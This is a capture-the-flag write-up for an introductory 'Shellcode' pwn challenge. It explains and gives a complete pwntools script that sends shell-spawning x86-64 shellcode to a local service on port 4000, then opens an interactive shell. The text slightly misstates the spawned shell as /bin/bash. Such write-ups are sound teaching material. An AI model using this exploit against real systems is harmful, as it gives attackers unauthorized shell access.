Writeup by iv3l for Shellcode

intro pwn x86/x64

February 27, 2025

The binary seems to directly execute the machine code sent by the user.

Let’s write a basic pwntools script:

  1. Architecture Context: The context(arch='amd64') specifies that the shellcode should be generated for a 64-bit architecture.
  2. Generate Shellcode: asm(shellcraft.sh()) generates a simple shellcode that spawns a /bin/bash shell.
  3. Remote Connection: remote('127.0.0.1', 4000) establishes a connection to the target at localhost on port 4000.
  4. Clean the Input: proc.clean() clears any old data from the connection to make sure we send clean input.
  5. Send Shellcode: proc.sendline(shellcode) sends the shellcode to the remote service.
  6. Execute a Command: proc.sendline(b'uname -a') sends a command (uname -a) to the remote system to check the environment or confirm access.
  7. Interactive Mode: Finally, proc.interactive() switches to interactive mode, allowing you to interact with the shell once the payload is executed.
#!/usr/bin/python
from pwn import *

# Set the architecture context to 64-bit
context(arch='amd64')

# Generate the shellcode to spawn a shell (using /bin/bash)
shellcode = asm(shellcraft.sh())

# Connect to the remote service (localhost, port 4000)
proc = remote('127.0.0.1', 4000)

# Clean any previous data from the connection
proc.clean()

# Send the shellcode to the remote service
print("[*] Sending shellcode to the remote service...")
proc.sendline(shellcode)

# Send an additional command to test the shell
print("[*] Sending 'uname -a' to check the system...")
proc.sendline(b'uname -a')

# Switch to interactive mode so we can interact with the shell
print("[*] Interactive shell opened...")
proc.interactive()